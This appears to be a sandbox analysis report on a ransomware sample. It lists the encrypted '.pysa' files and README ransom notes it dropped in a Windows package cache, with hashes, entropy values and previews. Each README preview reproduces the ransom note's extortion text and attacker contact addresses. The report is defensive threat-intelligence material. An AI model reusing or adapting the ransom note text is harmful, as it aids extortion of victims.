                  Preview: >..d....|.ZP..".:LQ.....k.5.3....MD...(..Fo7.a....YUc..s..G....l....P...j..E.SP..u..C....{M.@..7y....i...S:....u.w....G...V...1.\...yv...;..nd..*..I!%.o...v...".N.....z..".J.B'......8...G...........w.......Z..o..;.zMu.39U..L.i..l.>.F.|hE.,..Z.-{%i.`...-..+)....1.VQI.......9.8..0.6....p..B....gY..0......]b..u$..`1\dts......Y.....4~..g.'.g....Z.U........X....nQ<."J..e.....4 .m_........[..7.......)u ..7..w..r.....$...`...3.G..i.bU.G..#...;..(.F...`..[A...5.`Q#J......q..JO.|V.*.?...%m...6.R.s..o.....'.......~...j0E>.....j.]...n...ga./Io.V..AhY...?j..Q...]?.HX..t......4..mg..bOex...R..*......k...f.,...Jx.....I9....K....... ....H.......ny.@;o...<t.:.C)E...M...-.|.b..+4Ev.?..R^...Z....J...d....q..x.q.........F..y.v.}B.K.i.!..7]...1.^.._9.R.3.s.'..jF..zp.>..e..a.>...T.....-.y....leT....1...\.!..ofx8.*.....3s.K.K4.D._/._..?.[.p..p]k...O....1....P..Tb...S.F0F......7.......9`...-....>5...-...u. E.^./._.T8CDR.,B.O|...2.t.r..G..........8.A
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994420189842325
                  Encrypted:true
                  SSDEEP:3072:aMWFHk5mv+ZTPDINyx5hBT8tJvzxny4ZG848w+:a/kYvSANyOtJZE8K+
                  MD5:79A65DF20DDD102FABEBA6FAF1DC617A
                  SHA1:2DD05CB4B5FAE5A0FFD23071F4E8BE200DC410F2
                  SHA-256:798B94BDD281083FD17B3140449A4FC7F3F395869A88B8ABB78CB65966D619EB
                  SHA-512:48EEF57D3BE8EFC4828009EC26EE2CD9187D9BD2C2A51F0ACBD5BFE41C6FD4DBDF241784CFAADBF5787E5377A9C66DED1DA4C90C18CB8A1720F4F396A8F84C47
                  Malicious:true
                  Preview: ..h.....4..)..<.P'..Gg}ck...y...@."...@[-/.zb..{zd._.ho..\........pE..}..E..@.>{....|=.%.......h.?..g..|.`....I..{.vo...0v...../."v.H....f....1..Z..,...Y..`..8..../.....>K..|9.Z{..J.6p...!=.A..A.U.e\...,.J..~.t...{.+XD.S.Ns.PY.A3Hq............*8..W5{...s...Q......A..w..C.{..N.&&....k.oW]..@.x....6K[u:..TM|.1..q..~M}.c[...0.....M4..*...\[o7....R.uW..e......|.-.N.Df.8.b.....s.".5#.f.D.'M......BO.....:w..T$@H..]......<.g*.B. .*|...K...'...5..b.........,.[!H..../@...3...~.......A.;.X....ng.....'..Ww..D.!i..%l*.m......E...@...Z.\:..!...c.=.,!$.Z...W..}.>!..{..:O.....\.....]...J.g.......]......(.afcH0.UNy..m..5...2.)......3T..].....c......l......4...."...@J...M....?...KQE....c.,.........YA....!..Z.....A.^....*.,.Y.,#A.,..;.uY..7D*..uTM....=.J5|..v}.>]../.d+.zW..x..j....P.&.#jK1..4.Wz.........y{.....M....n.6.._.......'u_66v^...&..d...<.+......E.....Y..$..s.....g@...);`D.6.@...m...ov....d..F..86.J."w...gIm.]u.CZ..p..z...i........ .,......D...\.-
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1538048
                  Entropy (8bit):7.999840677401594
                  Encrypted:true
                  SSDEEP:24576:oEbEDG3T29p8YkR5S4pt0O3dmZSfsb3dshUqeNiBGwG4PRoR77VF4tMViIlTO1/G:N68vS9OQ1p2iNi13pOr4tKix1J0
                  MD5:C70A4AEF5DEB5B52DD3CC756792FD7D8
                  SHA1:6D165F5417260432B8FE38609C00A10680B489EC
                  SHA-256:8CB42889818C89663972228726AD283439A36D893E1506F66BCCE063C0FBE7CF
                  SHA-512:0A5EF0CABF7AF06CE75E2FA51181567A49162B8D7634BEB2397C12712CE2B8012FC70763E00876518E8071AC92BC06B77DC4BEDA296ECBC0C8BDA0A11D81CE7C
                  Malicious:true
                  Preview: .[.t..*.O8.6..C....c0...C..,...t....P.{.......i.)....t..%<.o....4.b.bS..cf......e.h.0.4...r...f.....b.Uc.~?....j.y...I.....B7#..O'..2M....*.lw....j:....~x#.../...$a_...TwA......f|.i..#.,t.M..l.....J........>.a....0..Sv.....KXAe.Y.9..Fw ...X.0[.....G.y...d.......&..M.....l.....q7..F./$a....a.^NB...7~bF.t.>....6.M..d.........F.....{u.D........3!.1...k..E...@W......|.|H.....Z..l.G..L......."%...(:C.rT.r)K.&W......^.J#A.<^)..x..m$.V.i.).-...?...cF..S.5.]].a.+.....(O*...'.....U.1.......r.6-..?8E..P....m.&).....B.......4.zT..j.?....H>.pV......M.'5I"...a.0.<5E..;.S...VW..o..........c.LG.:.\.S...>g.)K..3.vg.....N..p.b!;.i....[.. ..Z......{.9...Ob.jk...I^.IR.....F...j..0./.{.'[.%....,&......T....-h...LMg2|l.+.i.-rK.b...L..q4..R..OT.....&........,..?..>*..\. uN.8..@i.z.z..OIc..n...[.1...:U(.?.zM.]"clY2..#{.39.^..<f..d.1.2.Ff..d..O..`.Jb...FD....F...ki_........j..&j><....VC....CD.Q<..C.F....B..1E.84$8..?.`......|.(.3T...c...z.......$..Z..r.$VKM
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994294986891483
                  Encrypted:true
                  SSDEEP:1536:q7XfowBkglGkthmY/7HGXeGd0OGp4yRHKJ7MBB1aPusowLTrQ6ApZzDfgl4E7mLq:Bejthl/7Heg4yoVQvuaSQ6A3gygWdk
                  MD5:F17970477C69FB646B44750443343499
                  SHA1:E138B4FA375E3B1F71B4054159DA65BAFD2E1396
                  SHA-256:8C72140DE207C7A0FD528C9E8446C08C620B341DD11C319BCBB2F7652A464481
                  SHA-512:31152F82D2539E8B72C249CBCFA6CBF4EA520D98C7701FBAA2B7E80D683297DD9665852426E750D0AEFF02C5081DE78640A208CAB9E4DA7D7DCADD1D90FCC75F
                  Malicious:true
                  Preview: u.e..@F4..mE.F.,.5..N..W......x.G..ds$..&`....[......k.W..`D.......&..`.z.eUq.&...q../...]..+...Z...3.C......+.mTR.GP..@...9...zg,r.c./.5~7..1........'.6.I.N."...c.).".!c..1..~...<d.tL..pP..S.6~.@..?c...V-.....4....)Sj.5.........^..Y. 8...f..0.65...]_.'.l.:=...K..S...Sq....X.u.w:.....,]:...9.g`....]FM.#.=...sJ...M...OE.wF...J.......Pj...u...?.......X.p.)A.6FD|2f........"...Z.9he.+j.^z~.(..W.N?.n...z.....G+.N..3.jV.....j|....1.2..\w...mz_.$x.Er....75h..*.....+.....J.B...t.%^..e]5>N04...u.a.m">.t.j...w..d~.ex.y'.....b..'q...\..(.>T$.*S.H~.......D....Q......ke).O.c..........U..`~.<...2.9>.h@.w.D..:D..u......%=.RA}.(d.vj.^'.0F0..U...*.V....'.{.`s92-M...j....2.m.+ov...oz.2..S.Fu.dW....TT..f}...G.q.8F.3....Al.y........p[..'.z!o&...n...=..p.oX.S....~.cF.Q.D......t.[./.pR...........A.q..k.w..h.....U.....IB...?...3....B..y:..E.<=.1..[I.dgG.u..[{.".4d&......2.Cu.....T...(..Bo./X|%.#..<..U.`..3...y.L.s.n......X..lNM......$...;,....Dm\5.u\m.
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4917248
                  Entropy (8bit):7.999956506001408
                  Encrypted:true
                  SSDEEP:98304:gy1Pi9K5t2rx+r7m6Kkg+ytyiO6jQq5lLrIGN2w/3OhiiaXzvzzE3:BP3t2N+r7RKkgyiO6V5lvIGkkO4Bvzzq
                  MD5:59D3237A7A9669B03DAA9B289BF7BFCB
                  SHA1:F1E68D871F8CF1EB84AA954EC28018399441374B
                  SHA-256:18A62D16791B7C69182204C8E3E5BB6C6DE0EB37EAE6B467629F48895BD58160
                  SHA-512:29B9DC1125A9A268F2D6083A7A03860E3C4CEB7B33CF8D92D45C38957E6A8E402926D0456BC1297B84E574868FBF568D5444432C637F93D24E251C123AAFD7AD
                  Malicious:true
                  Preview: ...,?p.>.. .V.....+*2A...@.....M.P.B.P.....&)'U1>^.s.BI...U....}k..'q&...m.....e...).......T..w..^$.u.KC.e.f".e*..*..@].-..I..t&S..2..a......u......3.j1Za+.(....D.<..L.0....*..dF}=...Zf.).......!.=.........tg._..f.^.9....&..M.5I..h...U..%.p......Zf9.$-.oj-O.Bl.4......mEJ'.*<..*.....w....jU.Z#....!.A...D.0....zG..]..o..*....j?..B.IN.)t^|....jN.A.".`ic5b.NG......._.L..,vK=...*.;....b.H.WL.A#.w.{.u...zGp......).q..........K.d...V.b+.e.n..+!n..hmb....h.<3Y..sO.Q......6...X~..W^/9#v.HP.Fe7.$Jm2.Cx+.|.....W.b.e...B........+!....z.g/..p)f..f.).).M}....Q|p.. .)...C......ZF.c...j..}4..%V..m+.z.U....S!O4.....K....$....4(.UD'.A....{.P$....S.#[.16~..(..Hk..d...+.b..........{......o..Z.9...G..95......@.m.!y.`p5....:#.D..0....cL1...J...D..5.....r.vZ<L.i..!....S.m..E"c.!.`Z..B..4*...@.....yNJ4...0a...8.(..i?kwk..(.[.q6..uS..P.C.':.^&....#...h.X.I.q.Z...g_.g.......~...o..r..L.R_..T...L..uP.........-...]..V.xhD.1v.sW.#~V....+v:.....e.......t.7....BUY!;..
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.9949495484957644
                  Encrypted:true
                  SSDEEP:1536:wUSuMbzx+vkUupJ82ralJCydiYNLV7U4bprcPB3u2PfsOeNZ701MG0vIxGGjCL:yuMbzgMUI/ra/CHKLV424XeNE0vIxGgg
                  MD5:161E67FAD7475BA36575AD2D29D1F4D6
                  SHA1:ED63DF74D01DE2B70E0C8ACC3A905BC91B896CAE
                  SHA-256:25BA4E4C12159460BC85093E9F6BF5BD1E897DB2D2581CFE007B522FD8003E58
                  SHA-512:13C8854E9985001DDF83CDD1ACB7567DCDBA69714D633C0B8F39DEA2BEAFC08287FFC3E2883B88890E4C202F66D9FDEB75BBD1A90DF95F718D8E0B6F2F61CC05
                  Malicious:true
                  Preview: ...+.t...).4......D*...F%.t.c.s...+.....K.....R.2.C.......=. ...x{n.Z...C.`Os.[.T.rG.s$.......(....q..:......./...@...X.i2.v|f..P.<.D.p...&.Z.. ^..@.F.u/.s:l..L..\.Q.... qX.0x*.o.4...<...w...o........d..C.s.....{...v..N.....y..0..S.Z....3.X...<....4..)eO]m..?..q(n5...fa.n...{...o..&8(D...9..;y.7.;...dM.|...5-.Y........h....Z......B.:.8'OP>~).5.....,....M3.9.8...x..8.X........Z].Z..(....Z1T.ur5.Vqy..q.L.....,....\v@..S.."r&.....6...N..'..x..IG....@*b.1z...z..a....g....!.>.WKY....R-.....V_m.R#):;.zV...x$.:..w.t..*~~..l.zM..Q^..X.@...........[1.~@...:...)....e.\,u..vr6(.....zC......Vb].U..F.[...C0.%..a..{.0.d6.f_}1.SL.n..........-.Y.Tkn.d...rD.m...D%...;.C .....>../......r.^.^"..q.J.......e.<I....MLs.:..V...._P...Z.L,.....3.$n.8;%Ac...1.....,S..b....a.....A<....M.M.%.n......X...'.5r.s...1.....F.....!....N4.~'.@.c...D....hk.;..2..7..y...B..............xe2.&}Nc..`...^.].=.c.".p4h....\.n.G9lf;.....L..dM?._..P.....w>'..f..W........a...Q..
                  C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.067291748349717
                  Encrypted:false
                  SSDEEP:48:n4sskSMIH0pvwxftGNNNmy+H8DpchrDFPy0GK/IOXvDS5Ke4La/6/32umnFqv2Nb:neMIUKfab+wpaDFk5YL6KBq6/RmnFBZN
                  MD5:D522A4159EC056DC10B0999DEA4C1BD0
                  SHA1:624217A52422341FA21A84FC21AF743FEA53559E
                  SHA-256:F22B7A033427A19BF50EB14F279997FD3BDA460B614468B676C30B8EDA234978
                  SHA-512:B6CE3ADAAE872DBA8D6CAFE9B64410A2697090FE7FBCCF09EAD797E9D3A9F70BF9CB0A19EB33C7C103EFC74FB285F5FE37DF1DE0A4D2640D8BD1A18178E7C088
                  Malicious:false
                  Preview: ..O\.< ..Ma.......I.2. ..-9..r.G....N..~.a.lg....H..:.>.......e.v.axP.K.S...I.@.x...W..{.l..w.e....v.a#.f'*!....4.J;......{a'..lB.....n.Ri].*(.jS;..A.....#.x.c..-..=w....G..A...mH..k.f...TA..<"...>".7+.}. D6.np.T.:^..2..?>.....U.....u.a...9...&.....xG.[./.x..>...Y%.d/......2c...Xq..^.G8..wC.P..x..r.^q.8...2...|x.V-.V;......1T.!...6..jA.ab...mn...x.Z...48.za....!.../..-=~...J..A.n.D.f.....C.e....cpc.k.f.-.....N.z....S.|.chu'.z.=}@.!.........{CY..y.9Tk.@.y.q....... P.aGSZ.I...s.^...F.T..|.h......U..a{...[c...Ks..&s/.FUN..y....u..Xo..G..P.W1.1K.....~..,9...E..0.E&...v......kf.'N...L[...^......L.8/...s.o{J..].7../.N..k..j.7M..H]....z..t.). 5.....'}.;'.B.....ZD..3pG..<O.......y...h"..I...iU.##.sD.g.f2.$d....GV.V......yQ.k.....N...?.n<.....0.......Y.....E!.O..........<.P.D.....l...[.5..4.O.Ie_O.....\...V.c....B.o.wf.Rm...G.X.iO.T.9.k8$...,.4.4&..e{...>....w.{...5......I.yI..%....$....).U.~V%.|...).0...c..(.U.........Y*......
                  C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
